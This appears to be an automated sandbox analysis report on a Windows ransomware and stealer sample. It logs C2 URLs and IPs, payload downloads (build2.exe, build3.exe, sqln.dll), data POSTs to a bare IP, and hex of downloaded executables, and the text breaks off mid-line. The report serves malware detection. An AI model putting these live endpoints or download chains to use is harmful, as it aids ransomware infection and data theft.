Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\U source: sIQywRNC5M.exe, 00000005.00000003.2443409930.0000000003198000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2433429319.000000000319D000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2432422096.0000000003198000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2445196305.0000000003198000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.bgzq source: sIQywRNC5M.exe, 00000005.00000003.2334758881.0000000003293000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: sIQywRNC5M.exe, 00000005.00000003.2445067398.00000000035EC000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2465585747.00000000035B5000.00000004.00000020.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

System file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html

Jump to behavior

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	1_2_00410160
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	1_2_0040F730
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	1_2_0040FB98
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	5_2_0040F730
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	5_2_00410160
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	5_2_0040FB98

Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.5:49707 -> 201.103.73.225:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.5:49707 -> 201.103.73.225:80
Source: Traffic	Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.5:49709 -> 63.143.98.185:80
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 63.143.98.185:80 -> 192.168.2.5:49709
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 63.143.98.185:80 -> 192.168.2.5:49708
Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.5:49710 -> 63.143.98.185:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.5:49710 -> 63.143.98.185:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199673019888
Source: Malware configuration extractor	URLs: http://cajgtus.com/test2/get.php

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 12:47:06 GMTContent-Type: application/octet-streamContent-Length: 296448Last-Modified: Tue, 23 Apr 2024 19:19:16 GMTConnection: closeETag: "662809b4-48600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce d6 de 9e 8a b7 b0 cd 8a b7 b0 cd 8a b7 b0 cd 87 e5 6f cd 90 b7 b0 cd 87 e5 50 cd f6 b7 b0 cd 87 e5 51 cd a6 b7 b0 cd 83 cf 23 cd 83 b7 b0 cd 8a b7 b1 cd f8 b7 b0 cd 3f 29 55 cd 8b b7 b0 cd 87 e5 6b cd 8b b7 b0 cd 3f 29 6e cd 8b b7 b0 cd 52 69 63 68 8a b7 b0 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 47 05 fb 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 30 60 01 00 00 00 00 6d 40 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 61 01 00 04 00 00 00 d6 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 6a 01 00 64 00 00 00 00 40 60 01 66 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 60 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 e4 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 74 00 00 00 00 01 00 00 76 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 b5 5e 01 00 80 01 00 00 36 02 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 66 ef 00 00 00 40 60 01 00 f0 00 00 00 96 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 24 Apr 2024 12:47:27 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Mon, 09 Oct 2023 19:50:06 GMTETag: "4ae00-6074de5a4a562"Accept-Ranges: bytesContent-Length: 306688Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 184.85.65.125 184.85.65.125
Source: Joe Sandbox View	IP Address: 95.217.9.149 95.217.9.149
Source: Joe Sandbox View	IP Address: 104.21.65.24 104.21.65.24

Source: Joe Sandbox View	ASN Name: UninetSAdeCVMX UninetSAdeCVMX
Source: Joe Sandbox View	ASN Name: DIG001JM DIG001JM

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDHIEGCFHCGDGCAECBGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAEGHIJEHJDHIDHIDAEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFHJKEBAAECBFHIECGIUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEHUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 6925Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAECUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 829Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Code function: 1_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

1_2_0040CF10

Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sdfjhuz.com
Source: global traffic	HTTP traffic detected: GET /test2/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic	HTTP traffic detected: GET /test2/get.php?pid=903E7F261711F85395E5CEFBF4173C54 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic	HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com

Source: build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: sIQywRNC5M.exe, 00000007.00000003.2118138981.0000000003210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: sIQywRNC5M.exe, 00000005.00000003.2118339611.0000000009A60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: sIQywRNC5M.exe, 00000005.00000003.2118438194.0000000009A60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: api.2ip.ua
Source: global traffic	DNS traffic detected: DNS query: cajgtus.com
Source: global traffic	DNS traffic detected: DNS query: sdfjhuz.com
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDHIEGCFHCGDGCAECBGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 279Connection: Keep-AliveCache-Control: no-cache

Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: sIQywRNC5M.exe, 00000005.00000002.2547375866.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2544183942.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2543573711.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000002.2544952320.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe
Source: sIQywRNC5M.exe, 00000005.00000002.2544952320.00000000007E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe$run
Source: sIQywRNC5M.exe, 00000005.00000002.2544952320.00000000007E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe$runinstall020921_delay721_sec.exe0D
Source: sIQywRNC5M.exe, 00000005.00000002.2544952320.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exerun2b
Source: sIQywRNC5M.exe, 00000005.00000002.2545134934.0000000000846000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000003.2543898374.0000000000845000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000007.00000002.4493673195.000000000072C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test2/get.php
Source: sIQywRNC5M.exe, 00000007.00000002.4493673195.000000000071C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test2/get.php?pid=903E7F261711F85395E5CEFBF4173C54
Source: sIQywRNC5M.exe, 00000005.00000002.2544952320.00000000007A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test2/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true
Source: sIQywRNC5M.exe, 00000005.00000002.2544952320.00000000007A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test2/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=truelUc
Source: sIQywRNC5M.exe, 00000007.00000002.4493673195.000000000072C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test2/get.phpu
Source: sIQywRNC5M.exe, 00000005.00000003.2121629754.0000000009A60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: sIQywRNC5M.exe, 00000000.00000002.2030033825.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000001.00000002.2046900004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000004.00000002.2052330651.0000000005D80000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000002.2544651691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000006.00000002.2072698379.0000000005E90000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000007.00000002.4493001033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000015.00000002.2542986174.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000016.00000002.2555347739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000018.00000002.2705389001.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000019.00000002.2713323845.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: sIQywRNC5M.exe, 00000005.00000002.2544952320.00000000007E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.m
